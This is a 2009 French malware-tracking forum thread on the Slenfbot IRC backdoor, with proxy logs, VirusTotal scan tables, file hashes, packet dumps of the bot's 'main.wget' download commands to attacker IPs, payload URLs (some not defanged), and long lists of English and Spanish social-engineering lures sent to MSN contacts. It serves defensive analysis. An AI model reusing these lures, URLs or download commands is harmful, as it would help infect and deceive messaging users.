Slenfbot

par **Malekal_morte** » 18 janv. 2009 18:28

Slenfbot est une famille de Backdoor IRC qui se propage par MSN et disques amovibles.

Le malware intègre divers mécanismes de protections pour empécher sa détection/désinfection.
Il empèche entre autre les antivirus et empêche leurs mises à jour en bloquant les adresses via le fichier HOSTS de Windows
Voir : Protections Malwares : rendre la désinfection plus difficile.

En règle général un nouveau dropper est téléchargé par jour, Certaines variantes ont été postées dans la section MSN par le passé (Worm.Autorun), voir : http://forum.malekal.com/viewforum.php?f=57&start=100

Je ne posterai ici que les variantes qui sont très mal détectées ou si nouvelles méthodes de propagations.

~~~~

Code : Tout sélectionner

1232306088.787    385 192.168.1.70 TCP_MISS/200 845 GET http://66.79.162.130/css/ens.txt - DIRECT/66.79.162.130 text/plain
1232306091.557   1291 192.168.1.70 TCP_MISS/200 45929 GET http://www.dil2moons.com/img/evz.zip - DIRECT/205.209.137.90 application/x-zip-compressed

Message envoyé aux contacts MSN :

Code : Tout sélectionner

do you care if I upload this picture to my new profile or should I just delete it?
Did you see my magnificent work of art from yetsterday? I just made it with photoshop earlier this week! :)
I found a wallpaper from the new Batman Movie for you, you'll LOVE it! :D
You missed out on the party! I got really drunk for the first time in ages! (A)
This is seriously the DEFINITION OF SEXY, you absolutely must take a look ;)
can I post this picture of you on my blog? Or would you get really upset at me? :S

Fichier evz.zip reçu le 2009.01.18 18:16:23 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 1/38 (2.64%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.73 2009.01.18 -
AhnLab-V3 2009.1.15.0 2009.01.17 -
AntiVir 7.9.0.57 2009.01.18 -
Authentium 5.1.0.4 2009.01.17 -
Avast 4.8.1281.0 2009.01.16 -
AVG 8.0.0.229 2009.01.18 -
BitDefender 7.2 2009.01.18 -
CAT-QuickHeal 10.00 2009.01.17 -
ClamAV 0.94.1 2009.01.18 -
Comodo 935 2009.01.18 -
DrWeb 4.44.0.09170 2009.01.18 -
eSafe 7.0.17.0 2009.01.18 -
eTrust-Vet 31.6.6312 2009.01.17 -
F-Prot 4.4.4.56 2009.01.17 -
F-Secure 8.0.14470.0 2009.01.18 -
Fortinet 3.117.0.0 2009.01.15 -
GData 19 2009.01.18 -
Ikarus T3.1.1.45.0 2009.01.18 -
K7AntiVirus 7.10.594 2009.01.17 -
Kaspersky 7.0.0.125 2009.01.18 -
McAfee 5499 2009.01.18 -
McAfee+Artemis 5499 2009.01.18 -
Microsoft None 2009.01.18 -
NOD32 3774 2009.01.17 -
Norman 5.93.01 2009.01.16 -
nProtect 2009.1.8.0 2009.01.16 Trojan-Spy/W32.Agent.33837
Panda 9.5.1.2 2009.01.18 -
PCTools 4.4.2.0 2009.01.18 -
Prevx1 V2 2009.01.18 -
Rising 21.12.62.00 2009.01.18 -
SecureWeb-Gateway 6.7.6 2009.01.18 -
Sophos 4.37.0 2009.01.18 -
Sunbelt 3.2.1835.2 2009.01.16 -
Symantec 10 2009.01.18 -
TheHacker 6.3.1.5.222 2009.01.17 -
TrendMicro 8.700.0.1004 2009.01.16 -
ViRobot 2009.1.17.1563 2009.01.17 -
VirusBuster 4.5.11.0 2009.01.18 -
Information additionnelle
File size: 45568 bytes
MD5...: 5aa7d2cd77881e3795e67952d27164ae
SHA1..: d5a32d3e86e4b6b2a1ce3044e8b2a54178b0f473

par **Malekal_morte** » 25 févr. 2009 13:39

Message de propagation :

no mames esta foto esta bien rifada
tu crees que si sea cierto lo de esta foto?
te perdiste la mejor fiesta del año ni te imaginas con quien me tome una foto mira
te molestarias si te dijera que le pase esta foto tuya a un amigo?
no te enojas si le enseño esta foto a mis primos?
ya viste mi nuevo corte? me lo hice yo
quieres ver algo fuera de este mundo. mira mi mas reciente foto jaja
mira esta vieja esta rebuena va conmigo a la escuela
no recuerdo que me hallan tomado esta foto... pero esta buenisima jajaja
jajaja no recuerdo que me hayan tomado esta foto sabes quien fue?
mira nadamas que vieja la vi hoy en el centro comercial
este wallpaper esta buenisimo, lo tienes que poner como fondo de pantalla
no puedo ver esta foto en mi computadora, sale mal. dime si tu la puedes ver bien.
esta o no esta rebuena esta vieja??? pa mi esta buueeeenisima
viste la foto que edite en photoshop. ya me dijeron todos que me quedo muy bien
espero que no te molestes por esta foto que te voy a mandar jajaja, pero esta de risa.
ya habias visto esta foto que me tome?
foto nueva!! vela antes de que la suba.
acabo de ncontrar esto en facebook. no puedo creer que seas tu!
crees que quede bien esta foto en mi perfil de facebook?
solo pude tomar esta foto. odio mi camara.
no esta padrisimo como quedo nuestro arbolito de navidad?
Encontre tu foto en un sitio para adultos, eres tu?
cuando llegas puedes ayudarme, no puedo ver esta foto.
Te molestaria si pongo tu foto en mi blog? te puse en la pagina principal
Mira esta foto es perfecta para ti
enserio que no recuerdo cuando me tomaron esta foto. sera que ya estaba borracho?
alguien me dijo que mi peinado se ve ridiculo haber dime que piensas? :(
mira como quedo mi cuarto despues de la fiesta
crees que podrias editar esta foto por mi? por favor
mira si le alcanze a tomar una foto a la chica de anoche
Creo que te vas a desmallar cuando veas esta foto. Tienes que verla
estaba bien borracho en aquella fiesta aqui la prueba
no lo puedo creer, estoy en esta foto y me veo feisimo..
Dios mio, anoche estuvo loquisimo... mira la foto que tome!
jaja Te vas a alegrar muchisimo cuando veas esto!!
esta foto que te tomaron esta bien loca.
Tu no crees que estuve con ellos verdad? aqui la prueba
quien es ese que sale en esta foto con nosotros?
de verdad eres tu el de la foto?
te gusta esta foto nueva mia?
este foto esta super chistosa, la quieres ver?
no recuerdo haber hecho esto sabes quien tomo esta foto?
me veo gordo en esta foto?
mira sale tu mama en esta foto
esta es la foto que mas me gusta de ti
no mames te juro que no vuelvo a tomar mira la foto que me tomaron
mira mi nueva foto antes de que la suba!
oye tu, mira mi nueva foto!!!
cuando llegues checa mi nueva foto!
viste esta locura? no puedo creer que sea posible...
dios mio esta foto quien la tomo?
arregle este diseño para un amigo como me quedo?
Carajo! esta no puede ser su foto NO PUEDE SER!
Crees que puedes tener sexo con estos tres?! yo lo hize ;)
oye conoces a este chavo que sale en la foto conmigo?
te acuerdas del nombre de esta chava que sale conmigo en la foto?
ni me acuerdo de esta persona, solo que desperte alado de el jeje
estuvo de locura esta noche. ni me acuerdo de nada.
sera que este sea real?
estara mal que solo me acuerde del sexo y de nada mas?
te molesta si pongo esta foto de los dos en mi facebook?
esta foto es tuya?
acabo de encontrar esta foto tuya en myspace
mira a quien me tire anoche
acabo de editar esta foto para que la pongas de wallpaper
que piensas de mi nuevo look? bueno? malo?
creo que esta foto es la mejor de toda la fiesta
mira esta es la nueva computadora que quiero comprar como la ves?
sera esto de verdad o sera puro cuento?
no recuerdo ni su nombre y se desperto a lado de mi no mames
te molestaria que suba esta foto a mi nuevo perfil?
te acostate con alguien en año nuevo? por que yo si mira
estuvo poca madre en año nuevo mira nadamas a quien me cogi
que tal me quedaron las decoraciones de navidad?
de verdad esta foto es la mejor de todas la que tomamos
que tan malo soy para tomar fotos? acobo de tomar esta
me veo bien con mi nuevo look?
creo que esto no me queda muy bien, tu que piensas?
esta mal que me haya acostado con alguien y solo tenga esta foto de ella?
puedo poner esta foto tuya en mi album?
no me veo muy pasado verdad?
no puedo creer que dejara que se me fueran esta viejas en año nuevo
este no puedes ser tu, no me la creo
te apuesto a que no vas a poder dejar de reir cuando veas esto jajaj
oye puedes imprimir esta foto por mi? ya la imprimi con mi impresora pero no sale completa
esta bien te la voy a mandar, pero no se la vayas a mandar a nadie mas
te importaria si le muestro a mis primos tu foto?
como nos vemos en esta foto? creo que mis habilidades en el photoshop estan mejorando
crees que me quiten esta foto si la subo a facebook?
crees que esta foto este lo suficientemente bien como para ponerla como principal en mi perfil?
esto es a lo que me refiero con sexy apoco no?
ya viste las fotos de la semana pasada? ve esta nadamas para que veas como se puso
creo que esto es a lo que se refieren cuando hablan de sexy o no?
tu que me conociste de niño mira esta foto es viejisima me muero de pena jajaja
te importaria si pongo esta foto tuya en mi blog?
sabias que estoy tomando clases de photoshop? mira la foto que edite
puedo poner en mi nuevo album estas fotos tuyas?

Code : Tout sélectionner

1235572958.541   1035 192.168.1.25 TCP_MISS/200 35135 GET http://205.209.140.13/iisstart.jpg - DIRECT/205.209.140.13 image/jpeg

et

hxtp://www.thalz.com/uploadfiles/user2049/DVR-Imagen05.jpg.zip

Fichier iisstart.jpg reçu le 2009.02.25 13:34:34 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 9/39 (23.08%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.93 2009.02.25 Riskware.Win32.DelfInject!IK
AhnLab-V3 2009.2.24.0 2009.02.25 -
AntiVir 7.9.0.88 2009.02.25 DR/Delphi.Gen
Authentium 5.1.0.4 2009.02.25 -
Avast 4.8.1335.0 2009.02.25 -
AVG 8.0.0.237 2009.02.25 -
BitDefender 7.2 2009.02.25 Trojan.Slenfbot.Gen.1
CAT-QuickHeal 10.00 2009.02.25 -
ClamAV 0.94.1 2009.02.25 -
Comodo 983 2009.02.20 -
DrWeb 4.44.0.09170 2009.02.25 -
eSafe 7.0.17.0 2009.02.25 -
eTrust-Vet 31.6.6374 2009.02.25 Win32/Slenfbot!generic
F-Prot 4.4.4.56 2009.02.25 -
F-Secure 8.0.14470.0 2009.02.25 -
Fortinet 3.117.0.0 2009.02.24 -
GData 19 2009.02.25 Trojan.Slenfbot.Gen.1
Ikarus T3.1.1.45.0 2009.02.25 VirTool.Win32.DelfInject
K7AntiVirus 7.10.647 2009.02.25 -
Kaspersky 7.0.0.125 2009.02.25 -
McAfee 5535 2009.02.24 -
McAfee+Artemis 5535 2009.02.24 -
Microsoft 1.4306 2009.02.25 VirTool:Win32/DelfInject.gen!AF
NOD32 3888 2009.02.25 probably a variant of Win32/Injector.JW
Norman 6.00.06 2009.02.24 -
nProtect 2009.1.8.0 2009.02.25 -
Panda 10.0.0.10 2009.02.25 -
PCTools 4.4.2.0 2009.02.25 -
Prevx1 V2 2009.02.25 -
Rising 21.18.22.00 2009.02.25 -
SecureWeb-Gateway 6.7.6 2009.02.25 Trojan.Dropper.Delphi.Gen
Sophos 4.39.0 2009.02.25 -
Sunbelt 3.2.1856.2 2009.02.24 -
Symantec 10 2009.02.25 -
TheHacker 6.3.2.5.265 2009.02.25 -
TrendMicro 8.700.0.1004 2009.02.25 -
VBA32 3.12.10.0 2009.02.25 -
ViRobot 2009.2.25.1623 2009.02.25 -
VirusBuster 4.5.11.0 2009.02.24 -
Information additionnelle
File size: 34816 bytes
MD5...: ea08601c54ae456e363cc3f870ba282f
SHA1..: ac468248d3b7ba8672784fee98d543eda17f31c8

Fichier DVR-Imagen05.jpg.zip reçu le 2009.02.25 13:35:14 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 12/39 (30.77%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.93 2009.02.25 Riskware.Win32.DelfInject!IK
AhnLab-V3 2009.2.24.0 2009.02.25 -
AntiVir 7.9.0.88 2009.02.25 HIDDENEXT/Worm.Gen
Authentium 5.1.0.4 2009.02.25 W32/Heuristic-300!Eldorado
Avast 4.8.1335.0 2009.02.25 -
AVG 8.0.0.237 2009.02.25 -
BitDefender 7.2 2009.02.25 Trojan.Slenfbot.Gen.1
CAT-QuickHeal 10.00 2009.02.25 -
ClamAV 0.94.1 2009.02.25 -
Comodo 986 2009.02.20 -
DrWeb 4.44.0.09170 2009.02.25 -
eSafe 7.0.17.0 2009.02.25 -
eTrust-Vet 31.6.6374 2009.02.25 Win32/Slenfbot!generic
F-Prot 4.4.4.56 2009.02.25 W32/Heuristic-300!Eldorado
F-Secure 8.0.14470.0 2009.02.25 -
Fortinet 3.117.0.0 2009.02.24 -
GData 19 2009.02.25 Trojan.Slenfbot.Gen.1
Ikarus T3.1.1.45.0 2009.02.25 VirTool.Win32.DelfInject
K7AntiVirus 7.10.647 2009.02.25 -
Kaspersky 7.0.0.125 2009.02.25 -
McAfee 5535 2009.02.24 -
McAfee+Artemis 5535 2009.02.24 -
Microsoft 1.4306 2009.02.25 VirTool:Win32/DelfInject.gen!AF
NOD32 3888 2009.02.25 probably a variant of Win32/Injector.JW
Norman 6.00.06 2009.02.24 -
nProtect 2009.1.8.0 2009.02.25 -
Panda 10.0.0.10 2009.02.25 -
PCTools 4.4.2.0 2009.02.25 -
Prevx1 V2 2009.02.25 -
Rising 21.18.22.00 2009.02.25 -
SecureWeb-Gateway 6.7.6 2009.02.25 Virus.HIDDENEXT/Worm.Gen
Sophos 4.39.0 2009.02.25 -
Sunbelt 3.2.1856.2 2009.02.24 -
Symantec 10 2009.02.25 -
TheHacker 6.3.2.5.265 2009.02.25 W32/Generic!zip-dobleextension
TrendMicro 8.700.0.1004 2009.02.25 -
VBA32 3.12.10.0 2009.02.25 -
ViRobot 2009.2.25.1623 2009.02.25 -
VirusBuster 4.5.11.0 2009.02.24 -
Information additionnelle
File size: 60973 bytes
MD5...: c5ded628e929761a5793e39cf0785786
SHA1..: 65a0f76a64c83e6d1a976208eed6897ff901f469

par **Malekal_morte** » 07 mars 2009 11:59

Code : Tout sélectionner

0030  20 6d 61 69 6e 2e 77 67 65 74 20 68 74 74 70 3a    main.wget http:
0040  2f 2f 32 30 35 2e 32 30 39 2e 31 34 30 2e 31 33   //205.209.140.13
0050  2f 31 78 2e 6a 70 67 0d 0a 3a 70 73 79 42 4e 43   /1x.jpg.

 to join ##rwx2..
0050  3a 70 73 79 42 4e 43 2d 32 2e 33 2e 32 2e 34 31   :psyBNC-2.3.2.41
0060  20 33 33 32 20 5c 30 30 5c 46 52 41 5c 73 35 6d    252 \00\US\a5r
0070  76 32 62 34 6e 37 66 20 23 23 72 77 78 32 20 3a   v2b4n7f ##rwx2 :
0080  2a 20 6d 61 69 6e 2e 77 67 65 74 20 68 74 74 70   * main.wget http
0090  3a 2f 2f 36 33 2e 31 33 31 2e 31 34 39 2e 39 31   ://63.131.149.91
00a0  3a 38 38 38 38 2f 78 0d 0a 3a 70 73 79 42 4e 43   :8888/x

:WGET 
0080  20 02 5c 0f 20 20 68 74 74 70 3a 2f 2f 36 33 2e    .\.  http://63.
0090  31 33 31 2e 31 34 39 2e 39 31 3a 38 38 38 38 2f   131.149.91:8888/
00a0  78 20 5b 43 3a 5c 44 4f 43 55 4d 45 7e 31 5c 52   x

\.  http
0020  3a 2f 2f 36 33 2e 31 33 31 2e 31 34 39 2e 39 31   ://63.131.149.91
0030  3a 37 38 36 39 2f 78 20 5b 43 3a 5c 44 4f 43 55   :7869/x 


0010  3a 57 47 45 54 20 20 02 5c 0f 20 20 68 74 74 70   :WGET  .\.  http
0020  3a 2f 2f 32 30 38 2e 31 30 30 2e 31 2e 31 34 3a   ://208.100.1.14:
0030  34 37 39 30 2f 7a 20 5b 43 3a 5c 44 4f 43 55 4d   4790/z

Fichier z reçu le 2009.03.07 11:49:25 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 7/39 (17.95%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.03.07 -
AhnLab-V3 5.0.0.2 2009.02.27 -
AntiVir 7.9.0.105 2009.03.06 -
Authentium 5.1.0.4 2009.03.06 -
Avast 4.8.1335.0 2009.03.06 -
AVG 8.0.0.237 2009.03.06 -
BitDefender 7.2 2009.03.07 Trojan.Slenfbot.Gen.1
CAT-QuickHeal 10.00 2009.03.07 Win32.VirTool.DelfInject.gen!AF.8
ClamAV 0.94.1 2009.03.06 -
Comodo 1030 2009.03.06 -
DrWeb 4.44.0.09170 2009.03.07 Dialer.Siggen.121
eSafe 7.0.17.0 2009.03.05 -
eTrust-Vet 31.6.6386 2009.03.06 -
F-Prot 4.4.4.56 2009.03.06 -
F-Secure 8.0.14470.0 2009.03.07 -
Fortinet 3.117.0.0 2009.03.07 -
GData 19 2009.03.07 Trojan.Slenfbot.Gen.1
Ikarus T3.1.1.45.0 2009.03.07 -
K7AntiVirus 7.10.660 2009.03.06 -
Kaspersky 7.0.0.125 2009.03.07 -
McAfee 5545 2009.03.06 -
McAfee+Artemis 5545 2009.03.06 -
Microsoft 1.4405 2009.03.07 VirTool:Win32/DelfInject.gen!AF
NOD32 3916 2009.03.07 probably a variant of Win32/Injector.CR
Norman 6.00.06 2009.03.06 -
nProtect 2009.1.8.0 2009.03.07 -
Panda 10.0.0.10 2009.03.06 -
PCTools 4.4.2.0 2009.03.06 -
Prevx1 V2 2009.03.07 High Risk Cloaked Malware
Rising 21.19.42.00 2009.03.06 -
SecureWeb-Gateway 6.7.6 2009.03.07 -
Sophos 4.39.0 2009.03.07 -
Sunbelt 3.2.1858.2 2009.03.07 -
Symantec 1.4.4.12 2009.03.07 -
TheHacker 6.3.2.7.274 2009.03.07 -
TrendMicro 8.700.0.1004 2009.03.06 -
VBA32 3.12.10.1 2009.03.07 -
ViRobot 2009.3.7.1639 2009.03.07 -
VirusBuster 4.5.11.0 2009.03.06 -
Information additionnelle
File size: 35883 bytes
MD5...: 497545a36b0f149c57b2fb3b69e5b1f9
SHA1..: da4843d4ceb919ff74f8a670c6d28b4bb4dc0e1a

Fichier 1x.jpg reçu le 2009.03.07 11:49:55 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 6/37 (16.22%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.03.07 -
AhnLab-V3 5.0.0.2 2009.02.27 -
AntiVir 7.9.0.105 2009.03.06 DR/Delphi.Gen
Authentium 5.1.0.4 2009.03.06 -
Avast 4.8.1335.0 2009.03.06 -
AVG 8.0.0.237 2009.03.06 -
CAT-QuickHeal 10.00 2009.03.07 Win32.VirTool.DelfInject.gen!AF.8
ClamAV 0.94.1 2009.03.06 -
Comodo 1030 2009.03.06 -
DrWeb 4.44.0.09170 2009.03.07 -
eSafe 7.0.17.0 2009.03.05 -
eTrust-Vet 31.6.6386 2009.03.06 -
F-Prot 4.4.4.56 2009.03.06 -
F-Secure 8.0.14470.0 2009.03.07 -
Fortinet 3.117.0.0 2009.03.07 -
GData 19 2009.03.07 Trojan.Slenfbot.Gen.1
Ikarus T3.1.1.45.0 2009.03.07 -
K7AntiVirus 7.10.660 2009.03.06 -
Kaspersky 7.0.0.125 2009.03.07 -
McAfee 5545 2009.03.06 -
McAfee+Artemis 5545 2009.03.06 -
Microsoft 1.4405 2009.03.07 VirTool:Win32/DelfInject.gen!AF
NOD32 3916 2009.03.07 probably a variant of Win32/Injector.CR
Norman 6.00.06 2009.03.06 -
nProtect 2009.1.8.0 2009.03.07 -
Panda 10.0.0.10 2009.03.06 -
PCTools 4.4.2.0 2009.03.06 -
Prevx1 V2 2009.03.07 -
Rising 21.19.42.00 2009.03.06 -
SecureWeb-Gateway 6.7.6 2009.03.07 Trojan.Dropper.Delphi.Gen
Sophos 4.39.0 2009.03.07 -
Sunbelt 3.2.1858.2 2009.03.07 -
Symantec 1.4.4.12 2009.03.07 -
TheHacker 6.3.2.7.274 2009.03.07 -
TrendMicro 8.700.0.1004 2009.03.06 -
ViRobot 2009.3.7.1639 2009.03.07 -
VirusBuster 4.5.11.0 2009.03.06 -
Information additionnelle
File size: 35328 bytes
MD5...: d71c2f6f9a1a4cd793bb932ecac74630
SHA1..: 6b18e254d893182cc9f4b6b467f7e3c24ed65210

http://www.virustotal.com/fr/analisis/c ... a0a0edf261

par **Malekal_morte** » 06 avr. 2009 13:23

Code : Tout sélectionner

1239024908.019    362 192.168.1.71 TCP_MISS/304 337 GET http://85.235.67.50/cld - DIRECT/85.235.67.50 -
1239024908.132    492 192.168.1.71 TCP_MISS/200 117061 GET http://217.160.179.232/2cs - DIRECT/217.160.179.232 text/plain
1239024908.788   1124 192.168.1.71 TCP_MISS/200 27968 GET http://205.209.166.69/3x.jpeg - DIRECT/205.209.166.69 image/jpeg

Fichier 3x.jpeg reçu le 2009.04.06 13:15:08 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 5/40 (12.5%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.06 -
AhnLab-V3 5.0.0.2 2009.04.06 -
AntiVir 7.9.0.138 2009.04.06 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.06 -
Authentium 5.1.2.4 2009.04.05 -
Avast 4.8.1335.0 2009.04.05 -
AVG 8.5.0.285 2009.04.06 -
BitDefender 7.2 2009.04.06 -
CAT-QuickHeal 10.00 2009.04.06 -
ClamAV 0.94.1 2009.04.05 -
Comodo 1100 2009.04.05 -
DrWeb 4.44.0.09170 2009.04.06 -
eSafe 7.0.17.0 2009.04.05 -
eTrust-Vet 31.6.6435 2009.04.03 -
F-Prot 4.4.4.56 2009.04.05 -
F-Secure 8.0.14470.0 2009.04.06 -
Fortinet 3.117.0.0 2009.04.06 -
GData 19 2009.04.06 -
Ikarus T3.1.1.49.0 2009.04.06 -
K7AntiVirus 7.10.692 2009.04.03 -
Kaspersky 7.0.0.125 2009.04.06 -
McAfee 5575 2009.04.05 Spam-Mailbot.l
McAfee+Artemis 5575 2009.04.05 Spam-Mailbot.l
McAfee-GW-Edition 6.7.6 2009.04.06 Trojan.Dropper.Delphi.Gen
Microsoft 1.4502 2009.04.06 -
NOD32 3989 2009.04.06 -
Norman 6.00.06 2009.04.03 -
nProtect 2009.1.8.0 2009.04.06 -
Panda 10.0.0.14 2009.04.05 -
PCTools 4.4.2.0 2009.04.05 Trojan.Buzus
Prevx1 V2 2009.04.06 -
Rising 21.23.41.00 2009.04.03 -
Sophos 4.40.0 2009.04.06 -
Sunbelt 3.2.1858.2 2009.04.04 -
Symantec 1.4.4.12 2009.04.06 -
TheHacker 6.3.4.0.302 2009.04.06 -
TrendMicro 8.700.0.1004 2009.04.06 -
VBA32 3.12.10.2 2009.04.06 -
ViRobot 2009.4.6.1680 2009.04.06 -
VirusBuster 4.6.5.0 2009.04.05 -
Information additionnelle
File size: 27648 bytes
MD5...: f3484a77d88a5aa6067bf98ac71f8f49
SHA1..: 74bf5241bedb11c539645723ff2005c001401cd3

par **Malekal_morte** » 06 avr. 2009 13:32

hxtp://url.nkoreaconsult.info/img/cache/3.txt
hxtp://msg.nkoreaconsult.info/css/3m.txt

--> hxtp://img357.galeriadefotos.info/img357/my.php?id=DVR-Pictura09.jpeg

Fichier my.php_id_DVR-Pictura09.jpeg reçu le 2009.04.06 13:26:50 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 8/40 (20%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.06 -
AhnLab-V3 5.0.0.2 2009.04.06 -
AntiVir 7.9.0.138 2009.04.06 TR/ATRAPS.Gen
Antiy-AVL 2.0.3.1 2009.04.06 -
Authentium 5.1.2.4 2009.04.05 -
Avast 4.8.1335.0 2009.04.05 -
AVG 8.5.0.285 2009.04.06 -
BitDefender 7.2 2009.04.06 Gen:Trojan.Heur.50D52A1F1F
CAT-QuickHeal 10.00 2009.04.06 -
ClamAV 0.94.1 2009.04.05 -
Comodo 1100 2009.04.05 -
DrWeb 4.44.0.09170 2009.04.06 -
eSafe 7.0.17.0 2009.04.05 -
eTrust-Vet 31.6.6435 2009.04.03 -
F-Prot 4.4.4.56 2009.04.05 -
F-Secure 8.0.14470.0 2009.04.06 -
Fortinet 3.117.0.0 2009.04.06 -
GData 19 2009.04.06 Gen:Trojan.Heur.50D52A1F1F
Ikarus T3.1.1.49.0 2009.04.06 -
K7AntiVirus 7.10.692 2009.04.03 -
Kaspersky 7.0.0.125 2009.04.06 -
McAfee 5575 2009.04.05 Spam-Mailbot.l
McAfee+Artemis 5575 2009.04.05 Spam-Mailbot.l
McAfee-GW-Edition 6.7.6 2009.04.06 Trojan.ATRAPS.Gen
Microsoft 1.4502 2009.04.06 -
NOD32 3989 2009.04.06 -
Norman 6.00.06 2009.04.03 -
nProtect 2009.1.8.0 2009.04.06 -
Panda 10.0.0.14 2009.04.05 -
PCTools 4.4.2.0 2009.04.05 Trojan.Midgare.EYZ
Prevx1 V2 2009.04.06 -
Rising 21.23.41.00 2009.04.03 -
Sophos 4.40.0 2009.04.06 -
Sunbelt 3.2.1858.2 2009.04.04 -
Symantec 1.4.4.12 2009.04.06 Suspicious.MH690.A
TheHacker 6.3.4.0.302 2009.04.06 -
TrendMicro 8.700.0.1004 2009.04.06 -
VBA32 3.12.10.2 2009.04.06 -
ViRobot 2009.4.6.1680 2009.04.06 -
VirusBuster 4.6.5.0 2009.04.05 -
Information additionnelle
File size: 86088 bytes
MD5...: 003e2eba1aa114491ba86c293775f322
SHA1..: 97eab38a1398539764f12ff397f2d359a880407c

par **Malekal_morte** » 08 avr. 2009 09:26

hxtp://205.209.166.69/2c.exe

Fichier 2c.exe reçu le 2009.04.08 09:14:40 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 4/36 (11.12%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.08 -
AntiVir 7.9.0.138 2009.04.08 TR/ATRAPS.Gen
Antiy-AVL 2.0.3.1 2009.04.07 -
Authentium 5.1.2.4 2009.04.08 -
Avast 4.8.1335.0 2009.04.07 -
AVG 8.5.0.285 2009.04.07 -
CAT-QuickHeal 10.00 2009.04.07 -
ClamAV 0.94.1 2009.04.08 -
Comodo 1102 2009.04.07 -
DrWeb 4.44.0.09170 2009.04.08 -
eSafe 7.0.17.0 2009.04.07 -
eTrust-Vet 31.6.6444 2009.04.08 -
F-Prot 4.4.4.56 2009.04.08 -
Fortinet 3.117.0.0 2009.04.07 -
GData 19 2009.04.08 -
Ikarus T3.1.1.49.0 2009.04.08 -
K7AntiVirus 7.10.695 2009.04.07 -
McAfee 5577 2009.04.07 -
McAfee+Artemis 5577 2009.04.07 -
McAfee-GW-Edition 6.7.6 2009.04.08 Trojan.ATRAPS.Gen
Microsoft 1.4502 2009.04.08 -
NOD32 3994 2009.04.07 -
Norman 6.00.06 2009.04.07 -
nProtect 2009.1.8.0 2009.04.08 -
Panda 10.0.0.14 2009.04.07 -
PCTools 4.4.2.0 2009.04.07 Trojan.Buzus
Prevx1 V2 2009.04.08 -
Rising 21.24.21.00 2009.04.08 -
Sophos 4.40.0 2009.04.08 -
Sunbelt 3.2.1858.2 2009.04.08 VIPRE.Suspicious
Symantec 1.4.4.12 2009.04.08 -
TheHacker 6.3.4.0.303 2009.04.08 -
TrendMicro 8.700.0.1004 2009.04.08 -
VBA32 3.12.10.2 2009.04.08 -
ViRobot 2009.4.7.1683 2009.04.08 -
VirusBuster 4.6.5.0 2009.04.07 -
Information additionnelle
File size: 28160 bytes
MD5...: 4871b263042448b9d501b75c48451762
SHA1..: 5513c635a5bd5dbf4501755c61af796657d503b8

~~~

hxtp://img312.buscandophotos.info/img312/my.php?id=DVR-Pictura011.jpg

Fichier my.php_id_DVR-Pictura011.jpg reçu le 2009.04.08 09:15:20 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 4/40 (10%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.08 -
AhnLab-V3 5.0.0.2 2009.04.07 -
AntiVir 7.9.0.138 2009.04.08 TR/ATRAPS.Gen
Antiy-AVL 2.0.3.1 2009.04.07 -
Authentium 5.1.2.4 2009.04.08 -
Avast 4.8.1335.0 2009.04.07 -
AVG 8.5.0.285 2009.04.07 -
BitDefender 7.2 2009.04.08 -
CAT-QuickHeal 10.00 2009.04.07 -
ClamAV 0.94.1 2009.04.08 -
Comodo 1102 2009.04.07 -
DrWeb 4.44.0.09170 2009.04.08 -
eSafe 7.0.17.0 2009.04.07 -
eTrust-Vet 31.6.6444 2009.04.08 -
F-Prot 4.4.4.56 2009.04.08 -
F-Secure 8.0.14470.0 2009.04.08 -
Fortinet 3.117.0.0 2009.04.07 -
GData 19 2009.04.08 -
Ikarus T3.1.1.49.0 2009.04.08 -
K7AntiVirus 7.10.695 2009.04.07 -
Kaspersky 7.0.0.125 2009.04.08 -
McAfee 5577 2009.04.07 -
McAfee+Artemis 5577 2009.04.07 -
McAfee-GW-Edition 6.7.6 2009.04.08 Trojan.ATRAPS.Gen
Microsoft 1.4502 2009.04.08 -
NOD32 3994 2009.04.07 -
Norman 6.00.06 2009.04.07 -
nProtect 2009.1.8.0 2009.04.08 -
Panda 10.0.0.14 2009.04.07 -
PCTools 4.4.2.0 2009.04.07 Trojan.Midgare.EYZ
Prevx1 V2 2009.04.08 -
Rising 21.24.21.00 2009.04.08 -
Sophos 4.40.0 2009.04.08 -
Sunbelt 3.2.1858.2 2009.04.08 -
Symantec 1.4.4.12 2009.04.08 Suspicious.MH690.A
TheHacker 6.3.4.0.303 2009.04.08 -
TrendMicro 8.700.0.1004 2009.04.08 -
VBA32 3.12.10.2 2009.04.08 -
ViRobot 2009.4.7.1683 2009.04.08 -
VirusBuster 4.6.5.0 2009.04.07 -
Information additionnelle
File size: 74312 bytes
MD5...: c5b4b90579275e920c3c23e67cc6feb8
SHA1..: 8613f06067ef4c896c029f888eb500b02a9dae84

par **Malekal_morte** » 10 avr. 2009 16:11

Code : Tout sélectionner

1239380505.068   1000 192.168.1.200 TCP_MISS/200 31054 GET http://205.209.166.69/net/1x.exe - DIRECT/205.209.166.69 application/octet-stream

2x.exe 3x.exe

